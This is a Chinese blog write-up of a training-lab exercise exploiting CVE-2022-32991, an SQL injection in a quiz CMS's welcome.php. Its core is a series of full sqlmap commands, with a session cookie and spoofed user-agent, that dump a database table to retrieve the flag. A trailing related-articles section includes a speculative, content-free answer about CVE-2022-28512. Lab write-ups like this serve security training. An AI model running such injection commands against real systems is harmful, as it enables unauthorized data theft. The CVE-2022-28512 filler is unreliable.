[春秋云镜] CVE-2022-32991 靶场详解

最新推荐文章于 2024-12-26 15:20:34 发布
最新推荐文章于 2024-12-26 15:20:34 发布
阅读量2.5k 收藏 14
点赞数 5
分类专栏: 春秋云镜 网络安全 文章标签: sql web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_60374959/article/details/127995976
版权

目录

前期准备

工具

渗透测试

靶场提示

靶场实战

0x01 访问路径

0x02 注册用户并登入

0x03 url存在注入点

0x04 获取cookie和user-agent

0x05 sqlmap爆破

前期准备

工具

1.Burpsuite(对应java环境)

2.Sqlmap(对应python环境)

渗透测试

靶场提示

该CMS的welcome.php中存在SQL注入攻击

靶场实战

0x01 访问路径

0x02 注册用户并登入

0x03 url存在注入点

官方有提示:该CMS的welcome.php中存在SQL注入攻击。发现注入点。

0x04 获取cookie和user-agent

这存在两种方法,获取cookie是为了绕过身份验证,user-agent和random-agent主要是为了绕过客户端认证,否则容易被安全机制拦截。

方法一:抓包

点击第一个进去之后抓包

网页设置好代理->burpsuite设置代理->刷新页面

方法二:鼠标右键->检查->网络-> 刷新->找到第一个包,查看cookie和user-agent。

获取信息

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.56
​
Cookie: Hm_lvt_2d0601bd28de7d49818249cf35d95943=1669168062; PHPSESSID=ivsudpm85lhn6l3p28huleb65s; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1669169499

0x05 sqlmap爆破

验证是否存在注入

sqlmap -u 'http://eci-2zecq1f7rd92k35i8jqc.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=60377db362694&n=1&t=34' -p 'eid' --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.56" --cookie="Hm_lvt_2d0601bd28de7d49818249cf35d95943=1669168062; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1669168062; PHPSESSID=ivsudpm85lhn6l3p28huleb65s" -batch

爆破数据库

sqlmap -u 'http://eci-2zecq1f7rd92k35i8jqc.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=60377db362694&n=1&t=34' -p 'eid' --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.56" --cookie="Hm_lvt_2d0601bd28de7d49818249cf35d95943=1669168062; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1669168062; PHPSESSID=ivsudpm85lhn6l3p28huleb65s" -batch --dbs

爆破表

sqlmap -u 'http://eci-2zecq1f7rd92k35i8jqc.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=60377db362694&n=1&t=34' -p 'eid' --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.56" --cookie="Hm_lvt_2d0601bd28de7d49818249cf35d95943=1669168062; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1669168062; PHPSESSID=ivsudpm85lhn6l3p28huleb65s" -batch -D ctf --tables

爆破列

sqlmap -u 'http://eci-2zecq1f7rd92k35i8jqc.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=60377db362694&n=1&t=34' -p 'eid' --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.56" --cookie="Hm_lvt_2d0601bd28de7d49818249cf35d95943=1669168062; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1669168062; PHPSESSID=ivsudpm85lhn6l3p28huleb65s" -batch -D ctf -T flag --columns

 

爆破字段

sqlmap -u 'http://eci-2zecq1f7rd92k35i8jqc.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=60377db362694&n=1&t=34' -p 'eid' --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.56" --cookie="Hm_lvt_2d0601bd28de7d49818249cf35d95943=1669168062; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1669168062; PHPSESSID=ivsudpm85lhn6l3p28huleb65s" -batch -D ctf -T flag -C flag --dump

0x06 获得flag

 flag{e9dd7838-f6fe-4adf-a2a3-e7a49ed92a91}

总结

本次靶场主要考察的是对sql注入的用法,运用了一些sqlmap的参数对安全机制的绕过。

-p                       指定注入的参数
--batch                  使用默认方法去执行sql注入
--random-agent           随机更换请求头
--user-agent             使用指定的请求头
--cookie                 使用指定cookie

[网络安全自学篇] 六十五.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例(一)
杨秀璋的专栏
04-10 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了SMBv3服务远程代码执行漏洞(CVE-2020-0796),攻击者可能利用此漏洞远程无需用户验证,执行恶意代码并获取机器的完全控制。本文将详细讲解Vulnhub靶机渗透的环境搭建和JIS-CTF题目,采用Nmap、Dirb、中国蚁剑、敏感文件分析、SSH远程连接、Shell提权等获取5个flag。由于hack the box速度堪忧,作者选择了Vulnhub靶场,希望深入分析来
春秋CVE-2022-32991 Web Based Quiz System SQL注入
Ambition_sec的博客
11-16 773
春秋CVE-2022-32991 Web Based Quiz System SQL注入
春秋境:CVE-2022-32991
一只爱吃橙子的羊
11-29 1069
Web Based Quiz System SQL注入漏洞:CVE-2022-32991
春秋境】CVE-2022-32991靶场wp
热门推荐
MONSTERinCAT的博客
10-11 1万+
10月10日10时24分,基于多年来在网络靶场领域的深厚技术及场景积累,永信至诚i春秋正式发布春秋境.com社区,以春秋底层能力为基础,以平行仿真技术为支撑,以高仿真内容场景为核心,打造网络安全实战“元宇宙”,通过更加多元、开放、创新的线上技术交流空间,为更广泛的用户群体提供更轻量的靶场体验,助力攻防两端的实战技能提升。春秋境.com。
春秋境】CVE-2022-32991
ZXW_NUDT的博客
02-22 2585
春秋境】CVE-2022-32991
春秋 CVE-2022-32991靶场
orchid_sea的博客
11-23 688
进入CMS靶场,进入后台发现使用的GET方式传输数据,尝试sqlmap测试注入点。
春秋境.com】CVE-2022-32991通关思路
BG_ONE的博客
12-04 1177
春秋境.com】CVE-2022-32991思路
CVE-2022-26965
qq_43676541的博客
05-08 306
#简介 原文链接:https://culturesun.
框架安全-CVE 复现&Spring&Struts&Laravel&ThinkPHP漏洞复现
zz12345600354的博客
04-26 922
目录 服务攻防-框架安全&CVE 复现&Spring&Struts&Laravel&ThinkPHP * 概述 PHP-开发框架安全-Thinkphp&Laravel * 漏洞复现 * Thinkphp-3.X RCE Thinkphp-5.X RCE Laravel框架安全问题- CVE-2021-3129 RCE JAVAWEB-开发框架安全-Spring&Struts2 * Struts2框架安全
入侵防御漏洞复现(二)
szdx1043的博客
01-16 592
Nostromo由于在验证URL安全性方面存在,导致目录穿越,任何人都可以系统中任何文件。因此未经过身份验证的远程攻击者可以强制服务器指向/bin/sh这样的shell文件,借此执行任意命令。
春秋境:CVE-2022-32991SQL注入)
m0_65712192的博客
04-12 2190
该CMS的welcome.php中存在SQL注入攻击。
CVE-2022-32991漏洞复现(春秋手工注入sql+自己配置内网环境)
c0529的博客
12-15 692
Web Based Quiz System v1.0版本存在SQL注入漏洞,该漏洞源于welcome.php中的eid参数缺少对外部输入SQL语句的验证。得到了flag,就可以交了,这些过程证明了该漏洞可以利用于查询该数据库的敏感信息,可以利用这些方式得到数据库中用户的账户密码等等。从onder by 1一直尝试到order by 6,只有6报错,发现该表有五个字段。查询数据库中的所有表的名字,利用数据库自带的表,得到了所有的表。用hackbar插件输入(火狐浏览器)看到了flag表,查询表内的列。
CVE-2022-32991 春秋
biejianghua的博客
11-28 505
CVE-2022-32991
春秋——CVE-2022-32991
qq_51175992的博客
10-10 653
给到提示注入点是welcome.php的eid参数,因此需要在welcome.php的界面下关注get请求的eid参数部分。
CVE-2022-32991 漏洞复现
网安小菜鸡
01-17 1528
CVE-2022-32991 漏洞复现
春秋CVE-2022-32991 漏洞复现
BovidJang的博客
12-26 338
连接目标地址后打开一个登陆界面,先随便注册一个账号然后登陆,登陆后找到带有eid参数的网址后就可以进行sql注入。通过国家漏洞数据库发现该漏洞的注入点是welcome.php的eid参数。该CMS的welcome.php中存在SQL注入攻击。打开sqlmap依次查看内容,最终代码如下。
CVE-2022-32991
qq_63928796的博客
10-11 3207
发现可能存在sql注入漏洞,进而查看一下源码,mysqli_query没有任何的过滤。进去漏洞页面后正常注册登录,发现了p参数和welcome.php界面。该CMS的welcome.php中存在SQL注入攻击。保存成1.txt用sqlmap梭一下。用Seay源码审计一下。
春秋 CVE-2022-28512
最新发布
03-28
### 关于春秋 CVE-2022-28512 的分析 目前,在提供的引用资料中并未提及有关 **CVE-2022-28512** 的具体细节[^1][^2][^3][^4]。然而,基于常见的漏洞命名规则以及以往类似案例的经验,可以推测该编号可能对应某一特定版本中的安全缺陷。 #### 可能的影响范围 通常情况下,带有此类编号的安全问题主要涉及以下几个方面: - 应用程序逻辑错误可能导致权限提升或数据泄露。 - 配置不当引发未授权访问风险。 - 输入验证不足造成注入攻击隐患。 对于具体的 **影响范围** ,如果此漏洞存在于某个软件产品里,则受影响的对象应包括运行相应版本的所有实例;同时还要考虑是否存在连锁反应——即一个初始的小型弱点是否会被恶意行为者利用来触发更严重的后果。 #### 建议采取的措施 尽管缺乏针对 **CVE-2022-28512** 的确切描述,但仍可遵循通用的最佳实践来进行防护: 1. 更新至最新稳定版:厂商往往会迅速发布补丁解决已知威胁; 2. 实施最小化原则:仅授予必要的操作权限给用户账户; 3. 定期审查日志记录:及时发现异常活动迹象以便快速响应处理潜在入侵事件。 以下是实现上述部分建议的一个简单Python脚本示例用于检查系统更新状态: ```python import subprocess def check_updates(): try: result = subprocess.run(['apt', 'list', '--upgradable'], stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True) if "Listing..." not in result.stdout and len(result.stdout.strip()) > 0 : print("There are available updates:") print(result.stdout) else: print("Your system is up to date.") except Exception as e: print(f"An error occurred while checking for updates: {e}") check_updates() ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

心"元"意“码”

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值